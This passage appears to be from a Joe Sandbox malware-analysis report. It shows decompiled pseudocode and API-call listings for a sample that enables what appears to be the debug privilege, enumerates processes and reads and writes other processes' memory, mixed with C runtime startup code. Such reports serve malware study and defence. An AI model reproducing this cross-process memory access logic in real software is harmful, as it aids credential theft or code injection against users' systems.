    					_t218 = _v72 + 0xc;
    					while(_t143 != _t218) {
    						if(_v8 == _t193) {
    							goto L42;
    						}
    						_v60 = _t143;
    						_v68 =  &_v136;
    						_t146 = E00F61149( &_v68,  &_v60, 0x34); // executed
    						_t227 = _t227 + 0xc;
    						_v8 = _t146;
    						if(_t146 != _t193) {
    							_v52 = _v112;
    							_v44 = _v104;
    							_t150 = _v92;
    							_v28 = _t150;
    							_push(_t150 >> 0x10);
    							_push(0x40);
    							_v24 = _v88;
    							_t154 =  *(GetProcAddress(GetModuleHandleW(L"kernel32"), "LocalAlloc"))();
    							_v24 = _t154;
    							if(_t154 != _t193) {
    								_v68 = _t154;
    								_v60 = _v88;
    								_t159 = E00F61149( &_v68,  &_v60, _v26 & 0x0000ffff); // executed
    								_t227 = _t227 + 0xc;
    								if(_t159 != 0) {
    									_t221 =  &_v52;
    									E00F61CFA(_t221); // executed
    									_v8 = _a4(_t221, _a8);
    								}
    								LocalFree(_v24);
    							}
    						}
    						_t143 = _v128 + 0xfffffff8;
    					}
    					goto L42;
    				}
    				_t164 = _t133 - 1;
    				if(_t164 == 0) {
    					_v36 =  &_v28;
    					_t201 = E00F61526( *((intOrPtr*)( *((intOrPtr*)(__eax + 4)))), 4);
    					_v20 = _t201;
    					if(_t201 == 0) {
    						goto L43;
    					}
    					_v12 = 0;
    					if( *_t201 <= 0) {
    						goto L42;
    					}
    					_t45 = _t201 + 0xc; // 0xc
    					_t194 = _t45;
    					while(_v8 != 0) {
    						_v52 =  *((intOrPtr*)(_t194 - 8));
    						_v44 =  *_t194;
    						_t173 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 4)))) + 4)) +  *((intOrPtr*)(_t194 + 0xc));
    						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 4)))) + 4)) +  *((intOrPtr*)(_t194 + 0xc)) != 0) {
    							RtlInitUnicodeString( &_v28, E00F63718(_t173 + 4, 0x5c) + 2);
    							_t222 =  &_v52;
    							E00F61CFA(_t222);
    							_t181 = _a4(_t222, _a8);
    							_t201 = _v20;
    							_v8 = _t181;
    						}
    						_v12 = _v12 + 1;
    						_t194 = _t194 + 0x6c;
    						if(_v12 <  *_t201) {
    							continue;
    						} else {
    							break;
    						}
    					}
    					_t193 = 0;
    					goto L42;
    				}
    				if(_t164 == 1) {
    					_t183 = E00F618D9( &_v32, 0xb);
    					_v16 = _t183;
    					if(_t183 < 0) {
    						goto L43;
    					}
    					_v36 =  &_v28;
    					_t185 = _v32;
    					_v12 = 0;
    					if( *_t185 <= 0) {
    						goto L43;
    					}
    					_v20 = 0xfffffff0;
    					_v20 = _v20 - _t185;
    					_t195 = _t185 + 0x10;
    					while(_v8 != 0) {
    						_v52 =  *((intOrPtr*)(_t195 - 4));
    						_v44 =  *_t195;
    						_t27 = _t185 + 0x20; // 0x100000010
    						_t219 = ( *(_t195 + 0xe) & 0x0000ffff) + _v20 + _t195 + _t27;
    						if(_t219 == 0) {
    							L15:
    							_v12 = _v12 + 1;
    							_t195 = _t195 + 0x11c;
    							if(_v12 <  *_t185) {
    								continue;
    							}
    							goto L43;
    						}
    						_t186 = _t219;
    						_t28 = _t186 + 1; // 0x100000011
    						_t213 = _t28;
    						do {
    							_t211 =  *_t186;
    							_t186 = _t186 + 1;
    						} while (_t211 != 0);
    						_t225 = E00F61FA9(_t219, _t186 - _t213);
    						if(_t225 != 0) {
    							RtlInitUnicodeString( &_v28, _t225);
    							_v40 = _v40 & 0x00000000;
    							_v8 = _a4( &_v52, _a8);
    							LocalFree(_t225);
    						}
    						_t185 = _v32;
    						goto L15;
    					}
    					goto L43;
    				}
    				_v16 = 0xc0000002;
    				goto L43;
    			}

    0x00f619fa
    0x00f619fe
    0x00f61a00
    0x00f61a02
    0x00f61a09
    0x00f61a0c
    0x00f61a13
    0x00f61a16
    0x00f61a19
    0x00f61a1c
    0x00f61a23
    0x00f61a26
    0x00f61caa
    0x00f61cf2
    0x00f61cf9
    0x00f61cf9
    0x00f61cac
    0x00f61caf
    0x00f61ce5
    0x00f61ce5
    0x00f61ced
    0x00000000
    0x00000000
    0x00f61cb7
    0x00000000
    0x00000000
    0x00f61cbc
    0x00f61cc2
    0x00f61cc8
    0x00f61ccb
    0x00f61cce
    0x00f61cd9
    0x00f61cdc
    0x00f61cdf
    0x00f61ce2
    0x00f61ce2
    0x00f61cef
    0x00f61cef
    0x00000000
    0x00f61cef
    0x00f61a2c
    0x00f61a2d
    0x00f61b91
    0x00f61b99
    0x00f61ba0
    0x00000000
    0x00000000
    0x00f61bac
    0x00f61bb2
    0x00f61bbf
    0x00f61bc4
    0x00f61bc9
    0x00000000
    0x00000000
    0x00f61bd8
    0x00f61bdb
    0x00f61c94
    0x00f61be6
    0x00000000
    0x00000000
    0x00f61bec
    0x00f61bff
    0x00f61c02
    0x00f61c07
    0x00f61c0a
    0x00f61c0f
    0x00f61c17
    0x00f61c1d
    0x00f61c20
    0x00f61c23
    0x00f61c29
    0x00f61c2a
    0x00f61c36
    0x00f61c46
    0x00f61c48
    0x00f61c4d
    0x00f61c4f
    0x00f61c55
    0x00f61c65
    0x00f61c6a
    0x00f61c6f
    0x00f61c71
    0x00f61c74
    0x00f61c82
    0x00f61c82
    0x00f61c88
    0x00f61c88
    0x00f61c4d
    0x00f61c91
    0x00f61c91
    0x00000000
    0x00f61c9c
    0x00f61a33
    0x00f61a34
    0x00f61aff
    0x00f61b0f
    0x00f61b11
    0x00f61b16
    0x00000000
    0x00000000
    0x00f61b1c
    0x00f61b21
    0x00000000
    0x00000000
    0x00f61b27
    0x00f61b27
    0x00f61b2a
    0x00f61b33
    0x00f61b38
    0x00f61b43
    0x00f61b46
    0x00f61b5d
    0x00f61b63
    0x00f61b66
    0x00f61b71
    0x00f61b74
    0x00f61b77
    0x00f61b77
    0x00f61b7a
    0x00f61b80
    0x00f61b85
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00f61b85
    0x00f61b87
    0x00000000
    0x00f61b87
    0x00f61a3b
    0x00f61a4e
    0x00f61a54
    0x00f61a59
    0x00000000
    0x00000000
    0x00f61a62
    0x00f61a65
    0x00f61a68
    0x00f61a6d
    0x00000000
    0x00000000
    0x00f61a73
    0x00f61a7a
    0x00f61a7d
    0x00f61a80
    0x00f61a8d
    0x00f61a92
    0x00f61a9e
    0x00f61a9e
    0x00f61aa4
    0x00f61ae7
    0x00f61ae7
    0x00f61aed
    0x00f61af5
    0x00000000
    0x00000000
    0x00000000
    0x00f61af7
    0x00f61aa6
    0x00f61aa8
    0x00f61aa8
    0x00f61aab
    0x00f61aab
    0x00f61aad
    0x00f61aae
    0x00f61abb
    0x00f61abf
    0x00f61ac6
    0x00f61acf
    0x00f61adb
    0x00f61ade
    0x00f61ade
    0x00f61ae4
    0x00000000
    0x00f61ae4
    0x00000000
    0x00f61a80
    0x00f61a3d
    0x00000000

    APIs
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
      • Part of subcall function 00F618D9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
      • Part of subcall function 00F618D9: GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
      • Part of subcall function 00F618D9: LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
      • Part of subcall function 00F61FA9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,0000000100000013,00F61ABB), ref: 00F61FC4
      • Part of subcall function 00F61FA9: GetProcAddress.KERNEL32(00000000), ref: 00F61FCB
    • RtlInitUnicodeString.NTDLL(?,00000000), ref: 00F61AC6
    • LocalFree.KERNEL32(00000000), ref: 00F61ADE
    • _wcsrchr.LIBCMT ref: 00F61B4E
    • RtlInitUnicodeString.NTDLL(?,-00000002), ref: 00F61B5D
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F61C39
    • GetProcAddress.KERNEL32(00000000), ref: 00F61C40
    • LocalFree.KERNEL32(?), ref: 00F61C88
      • Part of subcall function 00F61D5F: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F61CA8), ref: 00F61D7B
      • Part of subcall function 00F61D5F: NtQueryInformationProcess.NTDLL(00000000,?,?,00000018,?), ref: 00F61DA8
      • Part of subcall function 00F61D5F: RtlGetCurrentPeb.NTDLL ref: 00F61DDE
      • Part of subcall function 00F61CFA: LocalFree.KERNEL32(?,?,?,?,00F61CD3), ref: 00F61D19
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 84%
    			E00F61DF3(void** __eax, void** _a4) {
    				long _v12;
    				void* _v16;
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v28;
    				void* _v32;
    				intOrPtr _v36;
    				char _v40;
    				intOrPtr _v44;
    				char _v104;
    				void* _t37;
    				void* _t44;
    				void* _t51;
    				intOrPtr _t55;
    				WCHAR* _t58;
    				long _t64;
    				intOrPtr* _t70;
    
    				_t70 = __eax;
    				_v24 =  &_v104;
    				_v20 = 0xf6cd30;
    				_v28 = 0xf6cd30;
    				_v36 =  *((intOrPtr*)(__eax + 4));
    				_v16 = 0;
    				_v32 = 0;
    				_v40 = 0;
    				_t37 = E00F61149( &_v24, __eax, 0x40); // executed
    				if(_t37 != 0 && _v104 == 0x5a4d) {
    					_push(0x18);
    					_push(0x40);
    					_t58 = L"kernel32";
    					_v40 =  *_t70 + _v44;
    					_t44 =  *(GetProcAddress(GetModuleHandleW(_t58), "LocalAlloc"))();
    					_v24 = _t44;
    					if(_t44 != 0) {
    						E00F61149( &_v24,  &_v40, 0x18); // executed
    						_t64 = ((0 |  *((intOrPtr*)(_v24 + 4)) != 0x0000014c) - 0x00000001 & 0xfffffff0) + 0x108;
    						_push(_t64);
    						_push(0x40);
    						_v12 = _t64;
    						_t51 =  *(GetProcAddress(GetModuleHandleW(_t58), "LocalAlloc"))();
    						_v32 = _t51;
    						if(_t51 != 0) {
    							_t55 = E00F61149( &_v32,  &_v40, _v12); // executed
    							_v16 = _t55;
    							if(_t55 == 0) {
    								LocalFree(_v32);
    							} else {
    								 *_a4 = _v32;
    							}
    						}
    						LocalFree(_v24);
    					}
    				}
    				return _v16;
    			}

    APIs
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F611A7
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,ReadFile,?,?,?,?,00000000), ref: 00F611D2
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F611D9
      • Part of subcall function 00F61149: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F61230
      • Part of subcall function 00F61149: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00F61263
      • Part of subcall function 00F61149: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00F612C5
      • Part of subcall function 00F61149: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,?), ref: 00F612F8
      • Part of subcall function 00F61149: GetProcAddress.KERNEL32(00000000), ref: 00F612FF
      • Part of subcall function 00F61149: LocalFree.KERNEL32(?), ref: 00F6133D
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00000018,?,?,00000000), ref: 00F61E63
    • GetProcAddress.KERNEL32(00000000), ref: 00F61E6C
    • GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,-00000109), ref: 00F61EB0
    • GetProcAddress.KERNEL32(00000000), ref: 00F61EB3
    • LocalFree.KERNEL32(?), ref: 00F61EEB
    • LocalFree.KERNEL32(?), ref: 00F61EF0
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 78%
    			E00F65661() {
    				intOrPtr* _v8;
    				void** _v12;
    				struct _STARTUPINFOW _v80;
    				signed int _t61;
    				void* _t62;
    				long _t65;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				int _t72;
    				signed int _t73;
    				intOrPtr* _t74;
    				void* _t77;
    				long _t85;
    				signed int _t86;
    				signed int _t87;
    				signed int _t88;
    				signed int _t91;
    				int _t93;
    				signed char _t98;
    				void* _t108;
    				signed int _t110;
    				signed int* _t111;
    				int _t112;
    				void** _t115;
    				void** _t120;
    				signed int _t121;
    
    				GetStartupInfoW( &_v80);
    				_push(0x40);
    				_t112 = 0x20;
    				_push(_t112); // executed
    				_t61 = E00F661C9(); // executed
    				if(_t61 != 0) {
    					_t2 = _t61 + 0x800; // 0x800
    					 *0xf6cda0 = _t61;
    					 *0xf6cd98 = _t112;
    					__eflags = _t61 - _t2;
    					if(_t61 >= _t2) {
    						L5:
    						__eflags = _v80.cbReserved2;
    						if(_v80.cbReserved2 == 0) {
    							L27:
    							_t91 = 0;
    							__eflags = 0;
    							do {
    								_t115 = (_t91 << 6) +  *0xf6cda0;
    								_t62 =  *_t115;
    								__eflags = _t62 - 0xffffffff;
    								if(_t62 == 0xffffffff) {
    									L31:
    									_t115[1] = 0x81;
    									__eflags = _t91;
    									if(_t91 != 0) {
    										_t50 = _t91 - 1; // -1
    										asm("sbb eax, eax");
    										_t65 =  ~_t50 + 0xfffffff5;
    										__eflags = _t65;
    									} else {
    										_t65 = 0xfffffff6;
    									}
    									_t108 = GetStdHandle(_t65);
    									__eflags = _t108 - 0xffffffff;
    									if(_t108 == 0xffffffff) {
    										L43:
    										_t58 =  &(_t115[1]);
    										 *_t58 = _t115[1] | 0x00000040;
    										__eflags =  *_t58;
    										 *_t115 = 0xfffffffe;
    										goto L44;
    									} else {
    										__eflags = _t108;
    										if(_t108 == 0) {
    											goto L43;
    										}
    										_t69 = GetFileType(_t108); // executed
    										__eflags = _t69;
    										if(_t69 == 0) {
    											goto L43;
    										}
    										_t70 = _t69 & 0x000000ff;
    										 *_t115 = _t108;
    										__eflags = _t70 - 2;
    										if(_t70 != 2) {
    											__eflags = _t70 - 3;
    											if(_t70 == 3) {
    												_t53 =  &(_t115[1]);
    												 *_t53 = _t115[1] | 0x00000008;
    												__eflags =  *_t53;
    											}
    										} else {
    											_t115[1] = _t115[1] | 0x00000040;
    										}
    										_t55 =  &(_t115[3]); // -16174484
    										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
    										__eflags = _t72;
    										if(_t72 == 0) {
    											L48:
    											_t68 = _t72 | 0xffffffff;
    											L46:
    											return _t68;
    										} else {
    											_t115[2] = _t115[2] + 1;
    											goto L44;
    										}
    									}
    								}
    								__eflags = _t62 - 0xfffffffe;
    								if(_t62 == 0xfffffffe) {
    									goto L31;
    								}
    								_t115[1] = _t115[1] | 0x00000080;
    								L44:
    								_t91 = _t91 + 1;
    								__eflags = _t91 - 3;
    							} while (_t91 < 3);
    							SetHandleCount( *0xf6cd98);
    							_t68 = 0;
    							__eflags = 0;
    							goto L46;
    						}
    						_t73 = _v80.lpReserved2;
    						__eflags = _t73;
    						if(_t73 == 0) {
    							goto L27;
    						}
    						_t93 =  *_t73;
    						_t74 = _t73 + 4;
    						_v8 = _t74;
    						_v12 = _t74 + _t93;
    						__eflags = _t93 - 0x800;
    						if(_t93 >= 0x800) {
    							_t93 = 0x800;
    						}
    						__eflags =  *0xf6cd98 - _t93; // 0x0
    						if(__eflags >= 0) {
    							L18:
    							_t110 = 0;
    							__eflags = _t93;
    							if(_t93 <= 0) {
    								goto L27;
    							} else {
    								goto L19;
    							}
    							do {
    								L19:
    								_t77 =  *_v12;
    								__eflags = _t77 - 0xffffffff;
    								if(_t77 == 0xffffffff) {
    									goto L26;
    								}
    								__eflags = _t77 - 0xfffffffe;
    								if(_t77 == 0xfffffffe) {
    									goto L26;
    								}
    								_t98 =  *_v8;
    								__eflags = _t98 & 0x00000001;
    								if((_t98 & 0x00000001) == 0) {
    									goto L26;
    								}
    								__eflags = _t98 & 0x00000008;
    								if((_t98 & 0x00000008) != 0) {
    									L24:
    									_t120 = ((_t110 & 0x0000001f) << 6) + 0xf6cda0[_t110 >> 5];
    									 *_t120 =  *_v12;
    									_t120[1] =  *_v8;
    									_t40 =  &(_t120[3]); // 0xc
    									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L48;
    									}
    									_t41 =  &(_t120[2]);
    									 *_t41 = _t120[2] + 1;
    									__eflags =  *_t41;
    									goto L26;
    								}
    								_t85 = GetFileType(_t77);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									goto L26;
    								}
    								goto L24;
    								L26:
    								_v12 =  &(_v12[1]);
    								_t110 = _t110 + 1;
    								_v8 = _v8 + 1;
    								__eflags = _t110 - _t93;
    							} while (_t110 < _t93);
    							goto L27;
    						} else {
    							_t111 = 0xf6cda4;
    							while(1) {
    								_t86 = E00F661C9(0x20, 0x40);
    								__eflags = _t86;
    								if(_t86 == 0) {
    									break;
    								}
    								 *0xf6cd98 =  *0xf6cd98 + 0x20;
    								_t16 = _t86 + 0x800; // 0x800
    								 *_t111 = _t86;
    								__eflags = _t86 - _t16;
    								if(_t86 >= _t16) {
    									L15:
    									_t111 =  &(_t111[1]);
    									__eflags =  *0xf6cd98 - _t93; // 0x0
    									if(__eflags < 0) {
    										continue;
    									}
    									goto L18;
    								}
    								_t87 = _t86 + 5;
    								__eflags = _t87;
    								do {
    									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
    									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
    									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
    									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
    									 *((short*)(_t87 - 1)) = 0xa00;
    									 *((short*)(_t87 + 0x20)) = 0xa0a;
    									 *((char*)(_t87 + 0x2f)) = 0;
    									_t87 = _t87 + 0x40;
    									_t28 = _t87 - 5; // -74
    									__eflags = _t28 -  *_t111 + 0x800;
    								} while (_t28 <  *_t111 + 0x800);
    								goto L15;
    							}
    							_t93 =  *0xf6cd98; // 0x0
    							goto L18;
    						}
    					}
    					_t88 = _t61 + 5;
    					__eflags = _t88;
    					do {
    						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
    						 *((short*)(_t88 - 1)) = 0xa00;
    						 *((intOrPtr*)(_t88 + 3)) = 0;
    						 *((short*)(_t88 + 0x1f)) = 0xa00;
    						 *((char*)(_t88 + 0x21)) = 0xa;
    						 *((intOrPtr*)(_t88 + 0x33)) = 0;
    						 *((char*)(_t88 + 0x2f)) = 0;
    						_t121 =  *0xf6cda0; // 0x0
    						_t88 = _t88 + 0x40;
    						_t11 = _t88 - 5; // -74
    						__eflags = _t11 - _t121 + 0x800;
    					} while (_t11 < _t121 + 0x800);
    					goto L5;
    				}
    				return _t61 | 0xffffffff;
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 00F6566E
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • GetFileType.KERNEL32(?), ref: 00F657A1
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 00F657D7
    • GetStdHandle.KERNEL32(-000000F6), ref: 00F6582B
    • GetFileType.KERNEL32(00000000), ref: 00F6583D
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-00F6CD94,00000FA0), ref: 00F6586B
    • SetHandleCount.KERNEL32 ref: 00F65894
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 54%
    			E00F63A0B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t16;
    				void* _t20;
    				void* _t23;
    				void* _t24;
    				void* _t25;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				void* _t48;
    				void* _t52;
    				intOrPtr _t56;
    				void* _t57;
    
    				_t49 = __edi;
    				_t48 = __edx;
    				_t37 = __ebx;
    				_push(0x14);
    				_push(0xf69dc8);
    				E00F65910(__ebx, __edi, __esi);
    				_t56 =  *0xf6cebc; // 0x0
    				if(_t56 == 0) {
    					__imp__HeapSetInformation(0, 1, 0, 0);
    				}
    				_t57 =  *0xf60000 - 0x5a4d; // 0x5a4d
    				if(_t57 == 0) {
    					_t16 =  *0xf6003c; // 0xe8
    					__eflags =  *((intOrPtr*)(_t16 + 0xf60000)) - 0x4550;
    					if( *((intOrPtr*)(_t16 + 0xf60000)) != 0x4550) {
    						goto L3;
    					} else {
    						__eflags =  *((intOrPtr*)(_t16 + 0xf60018)) - 0x10b;
    						if( *((intOrPtr*)(_t16 + 0xf60018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t16 + 0xf60074)) - 0xe;
    							if( *((intOrPtr*)(_t16 + 0xf60074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t16 + 0xf600e8);
    								_t7 =  *(_t16 + 0xf600e8) != 0;
    								__eflags = _t7;
    								 *(_t52 - 0x1c) = 0 | _t7;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t52 - 0x1c) = 0;
    				}
    				if(E00F658F2() == 0) {
    					E00F639E2(0x1c);
    				}
    				if(E00F6488C(_t37) == 0) {
    					E00F639E2(0x10);
    				}
    				E00F658A6();
    				 *((intOrPtr*)(_t52 - 4)) = 0;
    				_t20 = E00F65661(); // executed
    				_t60 = _t20;
    				if(_t20 < 0) {
    					_push(0x1b);
    					E00F64FB3(_t48, _t60);
    				}
    				 *0xf6ceb8 = GetCommandLineW();
    				 *0xf6bfc4 = E00F65609();
    				_t23 = E00F6555B();
    				_t61 = _t23;
    				if(_t23 < 0) {
    					_push(8);
    					_t23 = E00F64FB3(_t48, _t61);
    				}
    				_t24 = E00F65329(_t23, _t37);
    				_t62 = _t24;
    				if(_t24 < 0) {
    					_push(9);
    					E00F64FB3(_t48, _t62);
    				}
    				_t25 = E00F64D92(_t49, 0, 1);
    				_t63 = _t25;
    				if(_t25 != 0) {
    					_push(_t25);
    					E00F64FB3(_t48, _t63);
    				}
    				_t26 =  *0xf6c018; // 0x0
    				 *0xf6c01c = _t26;
    				_push(_t26);
    				_t27 = E00F620B7( *0xf6c004,  *0xf6c00c); // executed
    				 *((intOrPtr*)(_t52 - 0x20)) = _t27;
    				if( *(_t52 - 0x1c) == 0) {
    					E00F64F69(_t27); // executed
    				}
    				E00F64F95();
    				 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
    				return E00F65955( *((intOrPtr*)(_t52 - 0x20)));
    			}

    APIs
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00F69DC8,00000014), ref: 00F63A26
      • Part of subcall function 00F658F2: HeapCreate.KERNEL32(00000000,00001000,00000000,00F63A7A,00F69DC8,00000014), ref: 00F658FB
      • Part of subcall function 00F6488C: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00F63A8B,00F69DC8,00000014), ref: 00F64894
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F648B6
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648C3
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00F63A8B,00F69DC8,00000014), ref: 00F648D0
      • Part of subcall function 00F6488C: GetProcAddress.KERNEL32(00000000,FlsFree,?,00F63A8B,00F69DC8,00000014), ref: 00F648DD
      • Part of subcall function 00F6488C: TlsAlloc.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6492D
      • Part of subcall function 00F6488C: TlsSetValue.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F64948
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64963
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F64970
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6497D
      • Part of subcall function 00F6488C: EncodePointer.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F6498A
      • Part of subcall function 00F6488C: DecodePointer.KERNEL32(00F6475D,?,00F63A8B,00F69DC8,00000014), ref: 00F649AB
      • Part of subcall function 00F6488C: DecodePointer.KERNEL32(00000000,?,00F63A8B,00F69DC8,00000014), ref: 00F649DA
      • Part of subcall function 00F6488C: GetCurrentThreadId.KERNEL32(?,00F63A8B,00F69DC8,00000014), ref: 00F649EC
    • __RTC_Initialize.LIBCMT ref: 00F63A97
      • Part of subcall function 00F65661: GetStartupInfoW.KERNEL32(?), ref: 00F6566E
      • Part of subcall function 00F65661: GetFileType.KERNEL32(?), ref: 00F657A1
      • Part of subcall function 00F65661: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 00F657D7
      • Part of subcall function 00F65661: GetStdHandle.KERNEL32(-000000F6), ref: 00F6582B
      • Part of subcall function 00F65661: GetFileType.KERNEL32(00000000), ref: 00F6583D
      • Part of subcall function 00F65661: InitializeCriticalSectionAndSpinCount.KERNEL32(-00F6CD94,00000FA0), ref: 00F6586B
      • Part of subcall function 00F65661: SetHandleCount.KERNEL32 ref: 00F65894
    • __amsg_exit.LIBCMT ref: 00F63AAA
    • GetCommandLineW.KERNEL32(00F69DC8,00000014), ref: 00F63AB0
      • Part of subcall function 00F65609: GetEnvironmentStringsW.KERNEL32(00000000,00F63AC0), ref: 00F6560C
      • Part of subcall function 00F65609: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F65648
      • Part of subcall function 00F6555B: GetModuleFileNameW.KERNEL32(00000000,00F6C660,00000104), ref: 00F6557B
      • Part of subcall function 00F6555B: _wparse_cmdline.LIBCMT ref: 00F655A5
      • Part of subcall function 00F6555B: _wparse_cmdline.LIBCMT ref: 00F655E7
    • __amsg_exit.LIBCMT ref: 00F63AD0
      • Part of subcall function 00F65329: _wcslen.LIBCMT ref: 00F65349
      • Part of subcall function 00F65329: _wcslen.LIBCMT ref: 00F65381
    • __amsg_exit.LIBCMT ref: 00F63AE1
      • Part of subcall function 00F64D92: __initterm_e.LIBCMT ref: 00F64DC8
    • __amsg_exit.LIBCMT ref: 00F63AF4
      • Part of subcall function 00F620B7: RtlGetNtVersionNumbers.NTDLL(00F6CFD0,00F6CFCC,00F6CFD4), ref: 00F620E0
      • Part of subcall function 00F620B7: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000001), ref: 00F620FA
      • Part of subcall function 00F620B7: CloseHandle.KERNEL32(FFFFFFFF), ref: 00F62139
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
